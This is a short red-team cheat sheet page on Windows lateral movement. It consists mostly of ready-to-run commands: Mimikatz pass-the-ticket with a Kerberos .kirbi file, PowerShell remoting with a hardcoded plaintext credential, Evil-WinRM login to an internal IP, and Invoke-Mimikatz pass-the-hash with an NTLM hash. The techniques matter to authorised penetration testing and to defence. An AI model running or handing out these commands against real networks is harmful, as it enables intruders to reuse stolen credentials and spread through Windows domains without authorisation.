03 Lateral Movement

Mimikatz Ticket PTH
WinRM
PTH with Mimikatz
1
# Enable-PSRemoting
2
mimikatz.exe '" kerberos:ptt C:\Users\Public\ticketname.kirbi"' "exit"
3
Enter-PSSession -ComputerName ECORP
Copied!
1
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
2
$cred = New-Object System.Management.Automation.PSCredential ('domain.local\user_id', $pass)
3
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
4
​
5
# Evil-WinRM
6
https://github.com/Hackplayers/evil-winrm
7
ruby evil-winrm.rb -i 10.10.10.14 -u userId -p supersecurepassword -r evil.corp
Copied!
1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'
Copied!

Red Team (Windows) - Previous

02 Privileges Escalation

Next - Red Team (Windows)

04 AD Attacks

Last modified 2mo ago

Copy link